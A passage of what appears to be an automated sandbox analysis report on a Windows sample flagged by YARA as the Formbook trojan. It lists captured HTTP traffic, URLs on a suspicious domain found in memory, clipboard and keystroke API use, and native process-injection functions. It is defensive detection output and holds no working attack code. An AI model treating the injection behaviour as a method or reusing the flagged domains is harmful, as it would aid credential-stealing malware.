m4+QY$%6EJM+C*t#) h$V~7FovLKs}%nrMVpp~vGr<pe0{~v<u<vl!
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:37:31 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"Strict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingContent-Encoding: gzipContent-Length: 24178Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 f0 70 8f f3 c1 9b 1f 7e 76 f2 f9 7f fe e1 47 dc f9 72 16 3c bc f7 00 ff 70 ae 1f 1d 0f a2 65 30 e0 02 7b 7e 76 3c b0 a3 01 b7 88 bc a9 7f 75 3c 08 cf 0e 01 76 b9 88 0f c7 e3 f0 6c 21 cc bc f1 3c 7e 6b 80 59 3d db 7d 78 ef 8d 07 33 6f 69 73 ce b9 1d c5 de f2 78 f0 e3 cf 3f e6 cd 01 37 ce be cc ed 99 77 3c b8 f0 bd cb 45 18 2d 07 9c 13 ce 97 de 1c 20 2f 7d 77 79 7e ec 7a 17 be e3 f1 f4 32 e2 fc b9 bf f4 ed 80 8f 1d 3b f0 8e 25 c2 73 ef 8d 37 1e bc c9 f3 dc fb 41 00 df b9 cf e6 1e f7 f8 a3 cf 38 55 30 04 55 90 38 9e b3 fd 30 f6 42 c1 09 67 1c cf 3f fc bf 10 7e e9 2f 03 ef e1 83 31 fb 8b 29 05 5a a2 70 12 2e e3 02 25 f3 d0 9f bb de 15 a3 ba 04 7a e6 cd bd c8 5e 86 51 01 ba 42 c7 c1 fb 9f 7c 06 7f 87 29 41 29 96 d8 89 fc c5 92 5b 5e 2f 00 8f bd 58 04 be 63 2f fd 70 3e 0e dc f7 9e c6 e1 1c 30 06 76 1c c3 37 22 1f 58 3e f7 66 f6 00 f3 be 71 33 f8 2e 15 77 b5 1c 1c 0e 98 f4 9f 8c 9f 8c 19 88 10 46 67 83 d1 e0 bb 67 91 bd 38 1f 1c fe 1c 80 b1 10 80 fc 20 82 2a 71 a2 d5 6c f2 c8 8f 97 08 e3 bb 25 04 f6 64 65 07 3e 8f b8 23 db 59 fa f3 33 c1 8e 96 4f c6 d7 cb f9 b3 27 e3 b7 26 59 fe 80 e5 f7 97 de 0c 51 7d 14 78 33 
e0 bd 54 18 a6 7f 02 df 37 28 e6 ad 20 cf b3 08 63 1f c5 31 38 94 46 03 14 36 60 78 b2 12 75 d9 c0 df aa 8a bf 15 89 52 74 4a b1 29 45 c9 9f 65 2b a1 b0 57 d9 00 3b 07 79 7e d2 17 3e 11 49 46 f1 ed 68 27 d6 ab e8 8a 02 90 4b 02 50 ec 02 bb 12 47 2f 1a fd 36 89 6b a7 f0 3c 45 3c 11 b4 a0 70 15 f7 e6 ac c0 d3 17 45 ae 3e 8b ce ec b9 ff 25 29 e9 26 95 1a 96 f3 15 eb 92 6a 4b 36 19 c5 c4 8a 62 e5 d5 ab da 5c e1 45 2d 70 2a 17 34 c1 cc bf b2 14 d9 86 52 5c 8f b5 2f 12 20 15 a6 ea 79 d6 24 93 c6 e5 e5 cb 76 ae 51 6a 51 8b 18 5d 45 b5 93 a7 f9 e7 04 d4 2c a8 a3 91 a3 13 9d b6 cc 46 21 5d ef 93 ad c6 a6 62 b4 80 16 db 40 91 a4 44 76 05 b2 9b ca 51 0a 28 b4 02 79 ad 84 39 39 79 8a 52 10 68 49 26 d3 62 6e b3 26 44 b5 8e d6 a3 dc 05 de 37 c9 9d 94 ea 55 99 4f 70 30 25 53 e4 b6 b2 0b 32 60 52 96 dd 42 6e b5 ae 2f 45 c9 6a 35 7c ec 73 42 78 a1 ca Data Ascii: i m4+QY$%6EJM+C*t#) h$V~7FovLKs}%nrMVpp~vGr<pe0{~v<u<vl!
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:37:34 GMT
            Server: Apache
            X-Powered-By: PHP/8.1.29
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
            Strict-Transport-Security: max-age=63072000; includeSubDomains
            X-Frame-Options: SAMEORIGIN
            X-Content-Type-Options: nosniff
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Content-Length: 24178
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Tue, 05 Nov 2024 14:37:55 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            ETag: W/"66cce1df-b96"
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Tue, 05 Nov 2024 14:37:58 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            ETag: W/"66cce1df-b96"
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Tue, 05 Nov 2024 14:38:00 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            ETag: W/"66cce1df-b96"
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Tue, 05 Nov 2024 14:38:03 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 2966
            Connection: close
            Vary: Accept-Encoding
            ETag: "66cce1df-b96"
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:38:09 GMT
            Server: Apache
            Upgrade: h2,h2c
            Connection: Upgrade, close
            Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
            Accept-Ranges: bytes
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Content-Length: 358
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:38:12 GMT
            Server: Apache
            Upgrade: h2,h2c
            Connection: Upgrade, close
            Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
            Accept-Ranges: bytes
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Content-Length: 358
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:38:15 GMT
            Server: Apache
            Upgrade: h2,h2c
            Connection: Upgrade, close
            Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
            Accept-Ranges: bytes
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Content-Length: 358
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:38:18 GMT
            Server: Apache
            Upgrade: h2,h2c
            Connection: Upgrade, close
            Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
            Accept-Ranges: bytes
            Content-Length: 583
            Vary: Accept-Encoding
            Content-Type: text/html
            Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:38:32 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:38:34 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:38:37 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:38:40 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:38:45 GMT
            Server: Apache
            X-Frame-Options: SAMEORIGIN
            Content-Length: 690
            X-XSS-Protection: 1; mode=block
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:38:48 GMT
            Server: Apache
            X-Frame-Options: SAMEORIGIN
            Content-Length: 690
            X-XSS-Protection: 1; mode=block
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:38:51 GMT
            Server: Apache
            X-Frame-Options: SAMEORIGIN
            Content-Length: 690
            X-XSS-Protection: 1; mode=block
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Tue, 05 Nov 2024 14:38:53 GMT
            Server: Apache
            X-Frame-Options: SAMEORIGIN
            Content-Length: 690
            X-XSS-Protection: 1; mode=block
            Connection: close
            Content-Type: text/html; charset=utf-8
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></htm
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            content-type: text/html
            transfer-encoding: chunked
            content-encoding: gzip
            vary: Accept-Encoding
            date: Tue, 05 Nov 2024 14:38:59 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            content-type: text/html
            transfer-encoding: chunked
            content-encoding: gzip
            vary: Accept-Encoding
            date: Tue, 05 Nov 2024 14:39:02 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            content-type: text/html
            transfer-encoding: chunked
            content-encoding: gzip
            vary: Accept-Encoding
            date: Tue, 05 Nov 2024 14:39:04 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            content-type: text/html
            transfer-encoding: chunked
            date: Tue, 05 Nov 2024 14:39:07 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/css/style_v3.css
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/css/styleslot.css
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/genericons/genericons.css
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/js/functions.js
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/js/jquery-migrate.js
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/js/jquery.js
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/js/skip-link-focus-fix.js
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/twentyfifteen/js/html5.js
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            E-Banking Fraud

            Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_0042C3A3 NtClose,1_2_0042C3A3
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472A80 NtClose,LdrInitializeThunk,1_2_03472A80
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472D10 NtQuerySystemInformation,LdrInitializeThunk,1_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_034734E0 NtCreateMutant,LdrInitializeThunk,1_2_034734E0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03474260 NtSetContextThread,1_2_03474260
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03474570 NtSuspendThread,1_2_03474570
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472B00 NtQueryValueKey,1_2_03472B00
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472B10 NtAllocateVirtualMemory,1_2_03472B10
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472B20 NtQueryInformationProcess,1_2_03472B20
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472BC0 NtQueryInformationToken,1_2_03472BC0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472BE0 NtQueryVirtualMemory,1_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472B80 NtCreateKey,1_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472B90 NtFreeVirtualMemory,1_2_03472B90
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472A10 NtWriteFile,1_2_03472A10
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472AC0 NtEnumerateValueKey,1_2_03472AC0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472AA0 NtQueryInformationFile,1_2_03472AA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_034729D0 NtWaitForSingleObject,1_2_034729D0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_034729F0 NtReadFile,1_2_034729F0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472F00 NtCreateFile,1_2_03472F00
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472F30 NtOpenDirectoryObject,1_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472FB0 NtSetValueKey,1_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472E50 NtCreateSection,1_2_03472E50
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472E00 NtQueueApcThread,1_2_03472E00
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472EC0 NtQuerySection,1_2_03472EC0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472ED0 NtResumeThread,1_2_03472ED0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472E80 NtCreateProcessEx,1_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472EB0 NtProtectVirtualMemory,1_2_03472EB0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472D50 NtWriteVirtualMemory,1_2_03472D50
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472DC0 NtAdjustPrivilegesToken,1_2_03472DC0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472DA0 NtReadVirtualMemory,1_2_03472DA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472C50 NtUnmapViewOfSection,1_2_03472C50
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472C10 NtOpenProcess,1_2_03472C10
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472C20 NtSetInformationFile,1_2_03472C20
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472C30 NtMapViewOfSection,1_2_03472C30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472CD0 NtEnumerateKey,1_2_03472CD0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03472CF0 NtDelayExecution,1_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_034738D0 NtGetContextThread,1_2_034738D0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03473C30 NtOpenProcessToken,1_2_03473C30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03473C90 NtOpenThread,1_2_03473C90
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E4570 NtSuspendThread,LdrInitializeThunk,3_2_051E4570
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E4260 NtSetContextThread,LdrInitializeThunk,3_2_051E4260
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_051E2D10
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2C30 NtMapViewOfSection,LdrInitializeThunk,3_2_051E2C30
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2C50 NtUnmapViewOfSection,LdrInitializeThunk,3_2_051E2C50
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2CF0 NtDelayExecution,LdrInitializeThunk,3_2_051E2CF0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2F00 NtCreateFile,LdrInitializeThunk,3_2_051E2F00
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2E00 NtQueueApcThread,LdrInitializeThunk,3_2_051E2E00
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2E50 NtCreateSection,LdrInitializeThunk,3_2_051E2E50
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2ED0 NtResumeThread,LdrInitializeThunk,3_2_051E2ED0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E29F0 NtReadFile,LdrInitializeThunk,3_2_051E29F0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_051E2B90
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2B80 NtCreateKey,LdrInitializeThunk,3_2_051E2B80
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_051E2BC0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2A10 NtWriteFile,LdrInitializeThunk,3_2_051E2A10
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2A80 NtClose,LdrInitializeThunk,3_2_051E2A80
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E34E0 NtCreateMutant,LdrInitializeThunk,3_2_051E34E0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E38D0 NtGetContextThread,LdrInitializeThunk,3_2_051E38D0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2D50 NtWriteVirtualMemory,3_2_051E2D50
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2DA0 NtReadVirtualMemory,3_2_051E2DA0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2DC0 NtAdjustPrivilegesToken,3_2_051E2DC0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2C10 NtOpenProcess,3_2_051E2C10
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2C20 NtSetInformationFile,3_2_051E2C20
